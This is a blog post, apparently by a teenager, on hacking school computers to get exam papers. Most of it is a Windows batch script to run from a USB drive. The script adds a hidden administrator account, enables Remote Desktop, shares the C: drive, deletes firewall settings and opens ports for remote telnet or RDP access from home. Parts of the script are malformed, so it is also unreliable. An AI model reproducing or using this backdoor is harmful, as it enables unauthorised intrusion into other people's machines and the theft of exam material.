How to Hack your School Computers.

Leave a Comment


Its most important in mah case. As i'm 14 and class IXth student, i get too curious sometimes to know what is stored in the drives of the school computer.

 Honestly i look there in a desire of getting the ONLINE QUESTION papers. But Its hard opening the school drives as it is prohibited.

Now wat if i can hack mah school coimputer from mah home ? Will'nt it be too good to share ? Well dont worry m sharing this with you.


There are two ways to do so:

(i) Dropping a trojan.
(ii) Creating a batch file encoded in Net Framework and applying it.


Well i will cover the trojan trick later on. Now just concentrate on the batch file. Its just as easy as typing something in notepad and then saving it.

Tools required:


  • Pen Drive / USB drive
  • Mind
  • A lil bit of time.

Now What you gotta do :


  • Copy the below code
  • Paste in notepad
  • Save as .bat file
  Code :  

  


       @echo off
REM ......: Created By Jigsaw :......
REM ......: HackPcOnline.Com :......

REM EDIT THESE SETTINGS
set username=USERNAME
set password=PASSWORD
set rdport=3389
set tnport=23
set rport=CHANGE_THIS
REM END EDITING SETTINGS

REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor 
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> C:\attach.txt
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
cls
exit


You can change the username, password and the rport (randomn port you choose to be opened)

At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.

Save it and remove your pen drive.


Now run this bat file in ur school Pc. 
Now when you get to your home, just telnet the pc or  Remote desktop it.
You are  done gyes !! 



Please leave coments.


Next PostNewer Post Previous PostOlder Post Home

0 comments:

Post a Comment

A Feedback Costs Nothing Friends.

Powered by Blogger.